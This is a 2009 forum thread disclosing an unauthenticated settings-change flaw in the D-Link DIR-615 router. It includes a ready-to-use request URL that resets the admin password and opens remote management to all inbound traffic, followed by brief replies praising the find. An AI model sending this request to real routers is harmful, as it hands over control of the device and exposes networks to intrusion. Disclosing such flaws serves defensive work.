Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
D-Link DIR-615 Remote Exploit
Posted by: gerry
Date: December 15, 2009 01:10PM

D-Link's DIR-615 allows unauthenticated requests to change settings. The hole is confirmed in firmware version 3.10NA.

Example (changes admin password to 'pwdpwd'):
http://192.168.0.1/apply.cgi?admin_password=pwdpwd&admin_password1=pwdpwd&admPass2=pwdpwd&remote_enable=1&remote_http_management_enable=1&remote_http_management_port=8080&remote_inbound_filter=Allow_All&remote_http_management_inbound_filter=Allow_All

More details at http://www.hiredhacker.com/2009/12/15/d-link-dir-615-remote-exploit/

-g

Options: ReplyQuote
Re: D-Link DIR-615 Remote Exploit
Posted by: id
Date: December 16, 2009 10:12AM

nice find, I have a feeling if anyone bothered to just rip the code off of most consumer (and even business class) network devices they would find a vuln in just about every one.

-id

Options: ReplyQuote
Re: D-Link DIR-615 Remote Exploit
Posted by: xyberpix
Date: December 17, 2009 02:37AM

Nice work man, keep 'em coming!

Options: ReplyQuote


Sorry, only registered users may post in this forum.